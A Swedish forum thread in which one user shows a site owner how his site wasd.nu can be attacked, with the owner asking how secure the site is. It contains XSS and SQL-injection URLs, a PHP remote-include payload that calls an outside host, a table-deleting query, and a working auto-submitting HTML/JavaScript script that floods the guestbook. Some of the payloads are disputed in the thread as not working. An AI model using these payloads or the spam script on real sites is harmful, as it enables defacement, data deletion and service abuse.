Wasd.nu

[woody]

Du har glömt att säkra $_GET['id'] mot SQL-injections.

 

Visar en popupruta med texten "Skadlig kod"

www.wasd.nu/profile.php?id=<script>alert("Skadlig kod")</script>

 

Raderar kolumnen MEDLEMMAR

www.wasd.nu/profile.php?id=<?php mysql_query("DROP TABLE MEDLEMMAR"); ?>

 

Eftersom denna kod inkluderas i ditt script kommer den att köras på din server

www.wasd.nu/profile.php?id=<?php include('http://woodo.zxq.net/XSS.php'); ?>

[WASD]

Tackar! Fixar det så snart som möjligt.

Nu funkar det väl inte längre? Ska bara kolla på vilka andra ställen jag inte säkrat det.

 

Kan man verkligen skicka in PHP på det viset? Texten som kommer in kommer ju ut i echo, och php som skrivits ut av echo körs inte.

Denna raden:

echo "<?php echo "hej" ?>"

Skriver ut: <?php echo "hej" ?>

Inte hej

Redigerat 30 Juni 2010 av WASD

[woody]

http://wasd.nu/profile.php?id=1;DELETE+FROM+MEDLEMMAR

 

mysql_query('SELECT * FROM MEDLEMMAR WHERE id=1; DELETE FROM MEDLEMMAR');

 

Där försvann alla medlemmar...

[WASD]

Jag har gjort ett table som heter "test" som du får försöka ta bort, jag lyckas inte göra det på det sättet du påstår.

 

edit: "test" hette det, inte "asd" som jag skrev tidigare.

Redigerat 30 Juni 2010 av WASD

[woody]

Man kan inte köra dubbla queries i PHP 5.

[WASD]

Jag vet faktiskt inte vilken PHP version jag har men jag tror att det är 5.

 

Lyckas du ta bort "test"? Hur säker är min sida?

[Mezox]

Skruva upp svårighetsgraden på botskyddet. ;)

[woody]

Det här skriptet spammar din gästbok. Cirka 100 inlägg / sekund.

 

Efter 10 sekunder har skriptet postat 1000 inlägg som du blir tvungen att ta bort manuellt.

 

<html>
<head>

<script type="text/javascript">
function loadfnc() {
form = document.getElementById('sendthisform');
form.submit();
window.location.reload()
}
window.onload=loadfnc;
</script>

</head>
<body>

<iframe name="formtarget" style="display: none;"></iframe>
<form action="http://wasd.nu/gbok.php" method="post" id="sendthisform" target="formtarget">
<input type='hidden' name='fname' value='test'>
<input type='hidden' name='fmessage' value='test'>
</form>

</body>
</html>

 

Demo

Redigerat 30 Juni 2010 av Woodo

[WASD]

100 per sekund är lite mycket, jag har själv programmerat bottar och 30 per sekund är mer rimligt.

Kanske bäst att fixa ett botskydd då, sätter upp det på att-göra-listan.

 

Inget händer förresten när jag trycker på din demo-länk. Bara en vit sida och inget nytt i gästboken.

Redigerat 30 Juni 2010 av WASD

[woody]

Kolla i din gästbok nu.

[WASD]

Det där var 1 per sekund :P Men jag fixar ett botskydd imorgon.

[woody]

Om du kör skriptet på din egen dator kan den göra upp till 100 inlägg / sekund.